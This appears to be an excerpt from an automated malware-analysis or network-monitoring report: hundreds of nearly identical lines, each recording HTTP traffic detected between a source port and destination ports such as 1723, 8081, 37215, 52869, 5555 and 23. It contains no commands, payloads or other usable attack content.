Source: unknown | Network traffic detected: HTTP traffic on port 33400 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59868 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 51932 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60376 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 55676 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 55676 |
Source: unknown | Network traffic detected: HTTP traffic on port 37534 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 59868 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38234 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 41230 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37584 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33462 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 36758 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 36758 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 36758 |
Source: unknown | Network traffic detected: HTTP traffic on port 33082 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36612 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44406 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47146 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 38008 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 47126 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35798 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49212 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55150 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33660 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35166 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47126 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 38008 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43392 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 45432 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 43680 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55150 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33660 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 50082 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 47726 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 43066 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 43066 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 50082 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 52848 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43680 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56678 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43672 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59600 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 41110 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 58120 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 59996 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36422 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 43510 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60168 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48730 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37106 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 38296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 50082 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 38296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 38296 |
Source: unknown | Network traffic detected: HTTP traffic on port 49534 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 46768 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 56590 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 58116 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 57898 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55186 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56590 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 46768 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 49534 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 50296 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 51684 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 38552 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54336 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60400 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 5555 -> 51684 |
Source: unknown | Network traffic detected: HTTP traffic on port 33040 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44866 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37102 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60698 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 35090 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 59716 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 41828 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56420 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35090 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 50082 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36236 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 40170 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47074 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49068 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52786 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 34200 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48902 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 42578 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 46142 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 41362 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54230 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39726 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35504 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39520 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 55830 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55806 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49382 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33642 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60338 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36204 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 55806 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47758 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 34770 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 60354 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36068 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 35448 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 36068 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 34770 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 60354 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 35090 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 44470 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43728 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 56590 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44382 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 34770 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 60354 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36068 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 42226 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 42226 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 40428 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38842 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36532 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 42032 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 48082 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 50352 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 43476 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 42114 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 51098 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 51098 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49248 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49922 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 50986 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 57658 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 42114 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48858 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59850 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59850 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35090 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44254 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 37206 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 37206 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 38016 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 56302 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 35802 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 60620 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 37422 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38016 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 50986 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 57696 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49448 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 55106 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49448 |
Source: unknown | Network traffic detected: HTTP traffic on port 54388 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33008 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60476 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 57276 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 57696 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56478 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43536 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 51450 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 52336 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44254 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 60620 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 35802 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 42114 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43140 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56204 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55216 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 50082 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 37086 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 50422 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 38524 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 50422 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 38524 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 43536 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36438 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 50986 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 50422 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 38524 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 59542 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54590 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37594 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44386 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 46014 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37086 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 37594 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 44254 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36438 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 37636 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52694 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59420 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 51542 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 51542 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 51546 |
Source: unknown | Network traffic detected: HTTP traffic on port 43536 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 40158 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 57608 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54056 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 55956 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 41402 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39276 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 41186 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37086 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 54056 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 42114 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 37718 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36296 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54056 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 36438 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 50878 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 40956 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36966 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 58998 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55908 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 33878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 36966 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 40956 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 58998 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52740 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52756 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 35970 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 47564 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 50986 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52760 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52760 |
Source: unknown | Network traffic detected: HTTP traffic on port 36616 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36668 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44236 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36870 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 42544 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54056 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 59716 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 46236 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 46288 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41422 |
Source: unknown | Network traffic detected: HTTP traffic on port 55940 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52806 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41460 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52902 |
Source: unknown | Network traffic detected: HTTP traffic on port 53670 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 44254 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52936 |
Source: unknown | Network traffic detected: HTTP traffic on port 55940 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52948 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41474 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41590 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41598 |
Source: unknown | Network traffic detected: HTTP traffic on port 47564 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41600 |
Source: unknown | Network traffic detected: HTTP traffic on port 51428 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 34926 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54008 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60842 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41614 |
Source: unknown | Network traffic detected: HTTP traffic on port 55940 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 51428 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41650 |
Source: unknown | Network traffic detected: HTTP traffic on port 35090 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 34926 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41666 |
Source: unknown | Network traffic detected: HTTP traffic on port 46288 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 59166 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52900 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 41696 |
Source: unknown | Network traffic detected: HTTP traffic on port 59166 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 52988 |
Source: unknown | Network traffic detected: HTTP traffic on port 53012 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 41274 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 53518 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 51630 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 41130 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44936 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 59248 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 59248 |
Source: unknown | Network traffic detected: HTTP traffic on port 41130 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37086 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 54056 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 55940 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 34878 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 44936 |
Source: unknown | Network traffic detected: HTTP traffic on port 49130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 33470 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54786 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36438 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 47564 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 56666 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44668 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 46288 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 53884 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37062 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 45952 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 34096 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47980 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 45328 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 45328 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 45328 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55940 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 45328 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 49136 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59946 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37084 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47788 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48424 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52512 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 35042 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35184 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 39688 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 41146 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59982 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37658 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48424 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59342 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 43128 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 5555 -> 43128 |
Source: unknown | Network traffic detected: HTTP traffic on port 43130 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 54056 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 42114 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 48296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 47564 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 42658 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 46288 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 51862 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 44624 -> 1723 |
